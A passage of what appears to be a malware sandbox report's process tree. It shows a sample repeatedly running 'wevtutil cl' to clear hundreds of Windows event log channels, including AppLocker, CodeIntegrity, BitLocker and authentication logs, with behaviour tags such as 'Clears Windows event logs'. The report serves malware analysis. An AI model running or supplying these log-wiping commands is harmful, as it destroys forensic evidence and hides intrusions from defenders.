C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵PID:12272
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵PID:12096
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵PID:10684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵
- Clears Windows event logs
PID:8928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵PID:8820
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵PID:6080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵PID:7872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵PID:12032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵PID:11144
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵PID:9060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵PID:8888
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"3⤵PID:11228
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"3⤵
- Clears Windows event logs
PID:11792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"3⤵PID:6656
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Internet Explorer"3⤵PID:3268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Key Management Service"3⤵
- System Location Discovery: System Language Discovery
PID:9756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationDeviceMFT"3⤵PID:9524
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationDeviceProxy"3⤵PID:6420
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationFrameServer"3⤵PID:11040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MedaFoundationVideoProc"3⤵PID:6548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MedaFoundationVideoProcD3D"3⤵PID:7468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationAsyncWrapper"3⤵PID:11216
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationContentProtection"3⤵PID:3288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationDS"3⤵PID:11000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationDeviceProxy"3⤵PID:10528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationMP4"3⤵PID:8020
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationMediaEngine"3⤵PID:10800
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPerformance"3⤵PID:7232
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPerformanceCore"3⤵PID:9940
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPipeline"3⤵PID:9684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPlatform"3⤵PID:6164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationSrcPrefetch"3⤵PID:4236
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client-Streamingux/Debug"3⤵PID:9256
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Admin"3⤵PID:10476
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Debug"3⤵PID:6524
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Operational"3⤵PID:3332
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Virtual Applications"3⤵PID:10552
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-SharedPerformance/Analytic"3⤵
- Clears Windows event logs
PID:9732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Admin"3⤵PID:7696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Debug"3⤵PID:6444
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Diagnostic"3⤵PID:7356
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-IE/Diagnostic"3⤵PID:6968
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"3⤵PID:9988
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"3⤵PID:6892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-OneCore-Setup/Analytic"3⤵PID:8532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵PID:9908
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵PID:6756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Admin/Debug"3⤵PID:8596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Debug"3⤵PID:8288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Operational"3⤵PID:5408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Analytic"3⤵PID:8088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Debug"3⤵PID:8696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Operational"3⤵PID:9160
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-IPC/Operational"3⤵PID:10668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"3⤵PID:10620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Debug"3⤵PID:8956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Operational"3⤵PID:11060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AAD/Analytic"3⤵PID:9760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AAD/Operational"3⤵PID:6932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ADSI/Debug"3⤵PID:8468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ASN1/Operational"3⤵PID:8920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ATAPort/General"3⤵PID:7580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"3⤵PID:7872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:8604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-All-User-Install-Agent/Admin"3⤵PID:6412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AllJoyn/Debug"3⤵PID:6440
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AllJoyn/Operational"3⤵PID:6528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Admin"3⤵PID:6680
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/ApplicationTracing"3⤵PID:8080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Diagnostic"3⤵PID:8672
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Internal"3⤵PID:10192
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppID/Operational"3⤵PID:10348
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"3⤵PID:10796
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"3⤵PID:7628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Deployment"3⤵PID:6228
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Execution"3⤵PID:9964
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Admin"3⤵
- System Location Discovery: System Language Discovery
PID:9548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Analytic"3⤵PID:10632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Debug"3⤵PID:6488
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Diagnostics"3⤵PID:9960
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-State/Debug"3⤵PID:6708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-State/Diagnostic"3⤵PID:7240
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Admin"3⤵PID:8584
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Debug"3⤵PID:7904
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Operational"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:10672
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppSruProv"3⤵PID:6688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeployment/Diagnostic"3⤵PID:9412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeployment/Operational"3⤵PID:7640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Debug"3⤵
- Clears Windows event logs
PID:9708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Diagnostic"3⤵PID:11312
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Operational"3⤵PID:8164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Restricted"3⤵PID:7292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Analytic"3⤵PID:10984
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Operational"3⤵PID:10040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"3⤵PID:8916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"3⤵PID:9804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"3⤵PID:8496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"3⤵PID:9444
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"3⤵PID:8632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵PID:10664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"3⤵PID:9692
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"3⤵PID:7444
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵PID:11380
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵
- System Location Discovery: System Language Discovery
PID:8768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵PID:6148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Steps-Recorder"3⤵PID:7152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Debug"3⤵PID:8708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Operational"3⤵PID:10408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Performance"3⤵PID:9048
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccess/Admin"3⤵PID:10756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccess/Operational"3⤵PID:10296
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Admin"3⤵PID:8064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Operational"3⤵PID:10784
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AsynchronousCausality/Causality"3⤵PID:8516
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"3⤵PID:11376
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/GlitchDetection"3⤵PID:7680
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Informational"3⤵PID:8308
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Operational"3⤵PID:11768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Performance"3⤵
- System Location Discovery: System Language Discovery
PID:8260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/PlaybackManager"3⤵PID:7000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audit/Analytic"3⤵PID:8268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"3⤵PID:11616
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"3⤵
- System Location Discovery: System Language Discovery
PID:10876
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUser-Client"3⤵PID:8500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"3⤵
- Clears Windows event logs
PID:8004
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"3⤵PID:10624
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"3⤵PID:8204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/HCI"3⤵PID:7816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/L2CAP"3⤵PID:6360
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Diagnostic"3⤵PID:1840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Performance"3⤵PID:7572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:9260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"3⤵PID:8216
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"3⤵PID:11624
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Backup"3⤵PID:9768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"3⤵PID:7028
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"3⤵PID:6152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Battery/Diagnostic"3⤵PID:7964
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Biometrics/Analytic"3⤵PID:9792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"3⤵PID:6452
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵
- System Location Discovery: System Language Discovery
PID:10836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵PID:6368
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-Driver-Performance/Operational"3⤵PID:292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Management"3⤵PID:8412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Operational"3⤵PID:1732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/Tracing"3⤵PID:1596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"3⤵PID:11064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:11744
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"3⤵PID:10872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-Bthmini/Operational"3⤵PID:11580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵PID:10248
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-Policy/Operational"3⤵PID:11400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"3⤵PID:276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵PID:4136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵PID:7060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheMonitoring/Analytic"3⤵PID:11352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:10056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"3⤵PID:7080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CAPI2/Catalog Database Debug"3⤵PID:5180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"3⤵PID:11500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CDROM/Operational"3⤵PID:8676
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/Analytic"3⤵PID:6616
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ApartmentInitialize"3⤵PID:10188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ApartmentUninitialize"3⤵PID:11576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/Call"3⤵PID:1588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/CreateInstance"3⤵PID:11824
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ExtensionCatalog"3⤵PID:10196
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/FreeUnusedLibrary"3⤵PID:7564
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/RundownInstrumentation"3⤵PID:10532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/Activations"3⤵PID:8572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/MessageProcessing"3⤵PID:7844
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"3⤵PID:11528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"3⤵PID:11840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:11304
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"3⤵PID:6804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"3⤵PID:11596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Cleanmgr/Diagnostic"3⤵PID:11892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵PID:7120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CloudStore/Debug"3⤵PID:11272
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CloudStore/Operational"3⤵PID:9816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"3⤵PID:11800
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"3⤵PID:11884
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"3⤵PID:1860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"3⤵PID:6424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"3⤵PID:7084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Analytic"3⤵PID:11792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Operational"3⤵PID:6400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Debug"3⤵PID:11748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Operational"3⤵PID:11280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Debug"3⤵PID:11492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Operational"3⤵PID:11684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Debug"3⤵PID:12096
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Operational"3⤵PID:11428
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:11512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Operational"3⤵PID:11936
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Tracing"3⤵
- System Location Discovery: System Language Discovery
PID:9872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"3⤵PID:6276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"3⤵PID:11716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreWindow/Analytic"3⤵PID:12116
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreWindow/Debug"3⤵PID:9152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵PID:6980
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵PID:6536
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crashdump/Operational"3⤵PID:9736
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"3⤵PID:8252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-BCRYPT/Analytic"3⤵PID:7636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-CNG/Analytic"3⤵PID:8980
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"3⤵PID:11812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Debug"3⤵PID:11860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Operational"3⤵PID:12188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DSSEnh/Analytic"3⤵PID:11300
-
-
